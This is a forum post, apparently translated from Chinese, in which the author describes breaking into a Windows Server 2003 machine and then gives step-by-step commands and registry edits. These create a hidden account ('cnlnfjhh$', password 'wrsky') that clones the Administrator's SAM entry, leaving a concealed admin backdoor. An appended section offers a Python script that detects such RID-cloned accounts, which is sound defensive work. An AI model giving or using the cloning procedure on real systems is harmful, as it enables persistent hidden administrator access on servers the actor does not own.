[Server 2003] Account cloning on a Win2003 server

weixin_38090514 2007-11-05 08:48:54

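Today, with nothing better to do, I was checking sites with the guys from our CN group and picked up another 03 box.
There are a lot of Win2003 servers these days; nearly every web site I have come across lately runs 2003.
The cloning methods that worked on 2000 often fail when used on 03.
So, drawing on an old article from 焦点 (Focus) plus my own cloning experience, here it is for everyone. The method below is
100% effective on 2003!!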

After logging in over 3389 --

First create the user cnlnfjhh$
c:\>net user cnlnfjhh$ wrsky /add
// The trailing $ is there so that the account is not shown by net user at the console.

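Then run regedt32.exe (note: not regedit.exe).
First find HKEY_LOCAL_MACHINE\SAM\SAM and click it, then in the menu "Security" -> "Permissions" add the account or group you are currently logged in as,

tick "Permissions" -> "Full Control" -> "Allow", then click OK.
This lets you read the local SAM data directly.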

Now run regedit.exe
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$
The default value shows "0x3f1". Export the corresponding keys as follows:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$ as cnlnfjhh$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 as 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 as lf4.reg (the corresponding key for Administrators)
Open lf4.reg in Notepad and find the value of "F", which in this example is:

"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00

Copy it, open 3f1.reg, find the value of "F", delete it, and paste in the section above.
Open cnlnfjhh$.reg and copy its contents, which in this example is the following section:

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

Go back to 3f1.reg and paste this section at the end of the file. The final file contents are as follows:
Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00



[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

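After saving, delete the cnlnfjhh$ user [this newly added account must be deleted before importing into the database]
c:\>net user cnlnfjhh$ /delete
Run regedit.exe and import the 3f1.reg file we modified.
Finally, open regedt32.exe, find HKEY_LOCAL_MACHINE\SAM\SAM and click it, then in the menu "Security" -> "Permissions" remove the account added earlier.

Then log off the current user and log in as cnlnfjhh$ / wrsky, and it will have the highest privileges.

Cloning on 03 differs slightly from cloning on 2000; the difference is the first part of my article.

This creates an account, cnlnfjhh$, that cannot be seen with net user at the console or in "Computer Management". Remember to set the password properly the first time and do not change it, otherwise it will stop working.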
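
For defenders, the clone described in this post leaves a checkable trace: the "F" value under Users\000003F1 carries f4,01,00,00 (RID 0x1F4) at byte offset 0x30 instead of the key's own RID. The Python below is an added example, not part of the original post; it scans the text of an exported .reg file for that mismatch. The function name, the second account 000003F2 and its "F" bytes are constructed for illustration, and the 0x30 offset is an assumption that matches the post's sample.

```python
import re
import struct

RID_OFFSET = 0x30  # assumption: RID is the little-endian DWORD at byte 48 of "F"
USER_KEY = re.compile(r"\\SAM\\SAM\\Domains\\Account\\Users\\([0-9A-F]{8})\]$", re.I)

# "F" value for 000003F1 exactly as shown in the post (copied from 000001F4).
CLONED = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
'''
# Constructed contrast case: account 000003F2 whose "F" carries its own RID.
CLEAN_F = ",".join(f"{b:02x}" for b in bytes(48) + struct.pack("<I", 0x3F2) + bytes(28))
CLEAN = ('\n[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003F2]\n'
         '"F"=hex:' + CLEAN_F + "\n")
SAMPLE_REG = CLONED + CLEAN


def find_rid_mismatches(reg_text):
    """Return [(key_rid, f_rid)] for user keys whose "F" RID differs from the key name."""
    # Join regedit's backslash-continued hex lines into one logical line.
    joined = re.sub(r"\\\s*\n\s*", "", reg_text)
    hits, key_rid = [], None
    for line in joined.splitlines():
        line = line.strip()
        if line.startswith("["):
            # Only Users\<8 hex digits> keys hold an "F" value; Names\... is skipped.
            m = USER_KEY.search(line)
            key_rid = int(m.group(1), 16) if m else None
        elif key_rid is not None and line.lower().startswith('"f"=hex:'):
            raw = bytes.fromhex(line.split(":", 1)[1].replace(",", ""))
            if len(raw) >= RID_OFFSET + 4:
                f_rid = struct.unpack_from("<I", raw, RID_OFFSET)[0]
                if f_rid != key_rid:
                    hits.append((key_rid, f_rid))
    return hits


if __name__ == "__main__":
    for key_rid, f_rid in find_rid_mismatches(SAMPLE_REG):
        print(f"Users\\{key_rid:08X}: F value carries RID {f_rid:#x} ({f_rid})")
```

Regedit writes version 5.00 exports as UTF-16, so decode the file (for example `open(path, encoding="utf-16")`) before passing its text to the function.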